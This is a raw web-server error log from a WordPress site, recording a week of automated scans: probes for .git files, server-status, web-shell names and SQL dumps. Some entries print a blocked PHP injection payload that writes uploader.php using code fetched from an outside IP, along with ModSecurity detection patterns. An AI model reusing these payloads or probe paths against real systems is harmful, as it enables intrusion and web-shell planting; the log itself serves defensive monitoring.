"/wp-content/x.php"] [unique_id "ZQEX5jpb8gOKcqt49dMEnwAAAII"], referer: www.google.com [Tue Sep 12 22:49:05.203340 2023] [authz_core:error] [pid 3262:tid 140183546578688] [client 178.128.151.41:34680] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/12 22:49:07 [error] 3123#3123: *2113835 access forbidden by rule, client: 178.128.151.41, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Sep 13 03:50:24.046968 2023] [ssl:warn] [pid 9141:tid 140406210602880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 13 03:50:28.339185 2023] [ssl:warn] [pid 9142:tid 140406210602880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 13 03:50:28.738316 2023] [ssl:warn] [pid 9142:tid 140406210602880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 13 03:50:30.665457 2023] [ssl:warn] [pid 9142:tid 140406210602880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 13 03:50:32.923886 2023] [ssl:warn] [pid 9559:tid 139651129059200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 13 03:50:37.105608 2023] [ssl:warn] [pid 9560:tid 139651129059200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 13 03:50:37.797692 2023] [ssl:warn] [pid 9560:tid 139651129059200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 13 13:18:07.648370 2023] [autoindex:error] [pid 9713:tid 139650861627136] [client 128.199.248.115:50918] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 13 14:30:47.699802 2023] [authz_core:error] [pid 9715:tid 139650946316032] [client 142.93.158.96:52286] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/13 14:30:50 [error] 9675#9675: *2124827 access forbidden by rule, client: 142.93.158.96, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Sep 13 14:38:23.473068 2023] [authz_core:error] [pid 10366:tid 139650836449024] [client 64.227.126.135:52398] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/13 14:38:27 [error] 9675#9675: *2124896 access forbidden by rule, client: 64.227.126.135, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Sep 13 20:17:11.768890 2023] [:error] [pid 10366:tid 139650836449024] [client 20.171.117.31:56780] [client 20.171.117.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZQJfF1Wz5hcEkrr_uan9eQAAAMU"], referer: www.google.com [Wed Sep 13 20:29:59.633020 2023] [authz_core:error] [pid 9713:tid 139650844841728] [client 139.59.65.144:56946] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/13 20:30:05 [error] 9676#9676: *2127852 access forbidden by rule, client: 139.59.65.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Sep 13 22:27:08.368431 2023] [autoindex:error] [pid 9714:tid 139650676987648] [client 172.177.239.97:59232] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-admin/css/colors/coffee/index.php 2023/09/14 01:00:29 [error] 9675#9675: *2130007 access forbidden by rule, client: 164.92.155.72, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/09/14 01:00:29 [error] 9676#9676: *2130008 access forbidden by rule, client: 164.92.155.72, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Sep 14 03:09:20.695746 2023] [ssl:warn] [pid 9606:tid 140488750499712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 14 03:09:24.938109 2023] [ssl:warn] [pid 9607:tid 140488750499712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 14 03:09:25.377984 2023] [ssl:warn] [pid 9607:tid 140488750499712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 14 03:09:27.850018 2023] [ssl:warn] [pid 9607:tid 140488750499712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 14 03:09:30.133388 2023] [ssl:warn] [pid 10026:tid 140205364934528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 14 03:09:34.329627 2023] [ssl:warn] [pid 10028:tid 140205364934528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 14 08:32:57.783699 2023] [:error] [pid 10050:tid 140205046593280] [client 147.135.129.229:39036] [client 147.135.129.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:cyborg. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:cyborg: die(md5(4565462));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/index.php"] [unique_id "ZQMLidWE7I3vD3ZwB-bHAwAAAIg"], referer: investigacionperu.com 2023/09/14 14:46:17 [error] 9911#9911: *2137424 access forbidden by rule, client: 5.62.20.18, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2023/09/14 14:46:17 [error] 9910#9910: *2137425 access forbidden by rule, client: 5.62.20.18, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" [Fri Sep 15 03:17:25.010494 2023] [ssl:warn] [pid 15090:tid 140604112607104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 03:17:29.211555 2023] [ssl:warn] [pid 15092:tid 140604112607104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 03:17:29.767768 2023] [ssl:warn] [pid 15092:tid 140604112607104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 03:17:33.139616 2023] [ssl:warn] [pid 15092:tid 140604112607104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 03:17:35.407767 2023] [ssl:warn] [pid 15508:tid 139907266631552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 03:17:39.598311 2023] [ssl:warn] [pid 15509:tid 139907266631552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 10:03:17.607286 2023] [ssl:warn] [pid 31605:tid 140327548798848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 10:03:23.895408 2023] [ssl:warn] [pid 31617:tid 140327548798848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 10:03:24.434533 2023] [ssl:warn] [pid 31617:tid 140327548798848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 10:03:27.640531 2023] [ssl:warn] [pid 31617:tid 140327548798848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 10:03:29.985910 2023] [ssl:warn] [pid 32113:tid 140273302181760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 10:03:36.241677 2023] [ssl:warn] [pid 32122:tid 140273302181760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 15 15:36:15.724967 2023] [autoindex:error] [pid 32242:tid 140272943978240] [client 5.199.136.71:43422] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 02:14:33.077790 2023] [autoindex:error] [pid 32137:tid 140272918800128] [client 5.199.136.71:54100] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 03:23:25.177968 2023] [ssl:warn] [pid 10503:tid 140085843826560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 16 03:23:29.359829 2023] [ssl:warn] [pid 10506:tid 140085843826560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 16 03:23:29.828705 2023] [ssl:warn] [pid 10506:tid 140085843826560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 16 03:23:32.165167 2023] [ssl:warn] [pid 10506:tid 140085843826560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 16 03:23:34.442535 2023] [ssl:warn] [pid 10926:tid 140091580786560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 16 03:23:38.608256 2023] [ssl:warn] [pid 10929:tid 140091580786560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 16 10:29:58.094702 2023] [authz_core:error] [pid 10947:tid 140091389650688] [client 167.71.48.191:35394] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/16 10:30:05 [error] 10811#10811: *2161063 access forbidden by rule, client: 167.71.48.191, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Sep 16 11:39:12.823069 2023] [authz_core:error] [pid 10947:tid 140091255138048] [client 64.227.126.135:37048] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/16 11:39:18 [error] 10810#10810: *2161952 access forbidden by rule, client: 64.227.126.135, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Sep 16 12:36:34.954547 2023] [:error] [pid 11692:tid 140091280316160] [client 51.15.17.105:37996] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wso112233.php [Sat Sep 16 12:54:24.217475 2023] [:error] [pid 11692:tid 140091398043392] [client 51.15.17.105:38438] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell20211028.php [Sat Sep 16 13:04:38.638809 2023] [:error] [pid 11692:tid 140091288708864] [client 51.15.17.105:38648] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bala.php [Sat Sep 16 16:11:09.214036 2023] [authz_core:error] [pid 10947:tid 140091187996416] [client 139.59.182.142:41136] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/16 16:11:13 [error] 10811#10811: *2164081 access forbidden by rule, client: 139.59.182.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Sep 16 18:31:50.964380 2023] [autoindex:error] [pid 10948:tid 140091263530752] [client 168.61.166.51:43574] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 19:41:08.192429 2023] [autoindex:error] [pid 10946:tid 140091179603712] [client 66.55.64.134:44326] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 19:41:11.844724 2023] [autoindex:error] [pid 10946:tid 140091171211008] [client 66.55.64.134:44336] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 19:41:14.072494 2023] [autoindex:error] [pid 11692:tid 140091381257984] [client 66.55.64.134:44342] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 19:41:19.538500 2023] [autoindex:error] [pid 10948:tid 140091246745344] [client 66.55.64.134:44358] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 19:41:22.741478 2023] [autoindex:error] [pid 10947:tid 140091146032896] [client 66.55.64.134:44368] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 19:41:23.734547 2023] [autoindex:error] [pid 10946:tid 140091280316160] [client 66.55.64.134:44372] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 22:37:48.267730 2023] [autoindex:error] [pid 11692:tid 140091137640192] [client 74.249.241.27:46648] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 16 22:51:46.942190 2023] [:error] [pid 11692:tid 140091263530752] [client 163.172.67.65:46860] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wso112233.php [Sat Sep 16 23:20:19.236253 2023] [:error] [pid 11692:tid 140091238352640] [client 163.172.67.65:47198] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell20211028.php [Sat Sep 16 23:40:56.580822 2023] [:error] [pid 10947:tid 140091146032896] [client 163.172.67.65:47724] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bala.php [Sun Sep 17 00:04:07.398352 2023] [ssl:warn] [pid 10929:tid 140091580786560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 00:25:24.141311 2023] [ssl:warn] [pid 10929:tid 140091580786560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 00:25:39.475541 2023] [ssl:warn] [pid 10929:tid 140091580786560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 00:28:06.233537 2023] [ssl:warn] [pid 10929:tid 140091580786560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 00:28:41.056417 2023] [ssl:warn] [pid 10929:tid 140091580786560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 00:30:07.963299 2023] [ssl:warn] [pid 10929:tid 140091580786560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 00:33:12.518245 2023] [ssl:warn] [pid 5575:tid 139957628749696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 00:33:16.716151 2023] [ssl:warn] [pid 5586:tid 139957628749696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 01:31:15.101176 2023] [ssl:warn] [pid 1009:tid 140457311123328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 01:31:21.841147 2023] [ssl:warn] [pid 1680:tid 140457311123328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 01:34:07.372299 2023] [ssl:warn] [pid 8733:tid 139938075436928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 01:34:09.527133 2023] [ssl:warn] [pid 8735:tid 139938075436928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 01:34:52.677583 2023] [ssl:warn] [pid 3926:tid 140394770638720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 01:34:56.812187 2023] [ssl:warn] [pid 3939:tid 140394770638720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 03:07:11.436198 2023] [autoindex:error] [pid 4136:tid 140394352273152] [client 162.214.66.36:38402] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sun Sep 17 03:49:19.183622 2023] [ssl:warn] [pid 15668:tid 140711240447872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 03:49:25.343147 2023] [ssl:warn] [pid 15670:tid 140711240447872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 03:49:25.737649 2023] [ssl:warn] [pid 15670:tid 140711240447872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 03:49:27.538851 2023] [ssl:warn] [pid 15670:tid 140711240447872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 03:49:33.663762 2023] [ssl:warn] [pid 16195:tid 140340279531392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 03:49:37.811419 2023] [ssl:warn] [pid 16197:tid 140340279531392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 17 07:24:21.211109 2023] [:error] [pid 16536:tid 140339876660992] [client 20.198.69.36:43828] [client 20.198.69.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZQbv9deTSfQRTNyit-d8MAAAANI"], referer: www.google.com [Sun Sep 17 13:09:23.634517 2023] [autoindex:error] [pid 16203:tid 140339977373440] [client 54.37.121.239:49214] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Mon Sep 18 00:39:42.038160 2023] [:error] [pid 22325:tid 140339859875584] [client 20.38.168.10:58938] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Sep 18 00:39:45.815091 2023] [:error] [pid 22595:tid 140340080002816] [client 20.38.168.10:58940] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Sep 18 03:29:22.860505 2023] [ssl:warn] [pid 1016:tid 140134793054080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 18 03:29:25.086945 2023] [ssl:warn] [pid 1017:tid 140134793054080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 18 03:29:25.458886 2023] [ssl:warn] [pid 1017:tid 140134793054080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 18 03:29:27.833480 2023] [ssl:warn] [pid 1017:tid 140134793054080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 18 03:29:30.127204 2023] [ssl:warn] [pid 1689:tid 140333490820992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 18 03:29:34.302755 2023] [ssl:warn] [pid 1691:tid 140333490820992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 18 08:24:46.596435 2023] [:error] [pid 2378:tid 140333115451136] [client 118.163.251.59:38712] [client 118.163.251.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp.sql"] [unique_id "ZQhPnkHipaE6iino1h20mgAAAM4"] 2023/09/18 09:43:17 [error] 1670#1670: *19796 access forbidden by rule, client: 18.156.2.131, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Sep 18 11:19:58.179830 2023] [:error] [pid 2378:tid 140333190985472] [client 179.43.191.18:42830] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Sep 18 11:19:58.532284 2023] [:error] [pid 1712:tid 140333165807360] [client 179.43.191.18:42832] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Sep 18 11:39:07.125681 2023] [:error] [pid 1710:tid 140333048309504] [client 185.44.156.129:43612] [client 185.44.156.129] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wordpress.sql"] [unique_id "ZQh9KzmoCX40uvcmBhCHPgAAABY"] [Mon Sep 18 14:58:04.430311 2023] [:error] [pid 1712:tid 140333056702208] [client 185.162.16.58:47214] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ 